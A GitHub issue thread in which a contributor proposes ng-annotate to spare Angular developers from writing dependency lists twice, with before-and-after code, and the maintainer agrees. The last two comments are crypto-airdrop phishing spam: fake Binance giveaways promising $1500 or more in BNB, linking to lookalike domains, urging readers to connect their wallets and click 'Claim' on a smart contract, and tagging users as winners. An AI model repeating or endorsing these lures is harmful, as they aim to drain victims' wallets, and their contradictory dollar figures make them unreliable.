### ISSUE TITLE
Use ng-annotate for less painful DI management

### ISSUE THREAD

**Issue by daviskoh** [evanmrose/mean-best-practices#1]
Note sure if this will clash at all w/ browserify's DI as I'm not too familiar w/ the tool but...

Proposal: instead of typing out essentially 2 lists of Angular dependencies (string array elements & func args), use [ng-annotate](https://github.com/olov/ng-annotate)

Gulp Plugin: https://github.com/Kagami/gulp-ng-annotate

Basically ([from this section](https://github.com/evanmrose/mean-best-practices#dependency-injection)):

```
myApp.controller('nameOfController', ['$scope', '$timeout', 'nameOfService', function($scope, $timeout, nameOfService){
   ...your code here...
}]);
```

would change to

```
// @ngInject
function nameOfController($scope, $timeout, nameOfService) {
    ...your code here...
}
myApp.controller('nameOfController', nameOfController);
```

This also has the added benefit that nameOfController is a named func and would appear as such in the stack traces for any errors.

**Comment by evanmrose** [comment]
Good call. I'm using it for Tenxify and it works just fine w Browserify. Pls submit a pull req

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by chasedson** [comment]
# $BNB Airdrop: Claim Your $2000 in BNB Now!

You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://public.bnbstatic.com/image/pgc/202401/1e7c136e591d4cf4e6572503e8629d2c.png)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @genkey6, @zeyaddeeb, @fr0zenrain, @cocoonkid, @Istom1n, @ayn, @tassionoronha
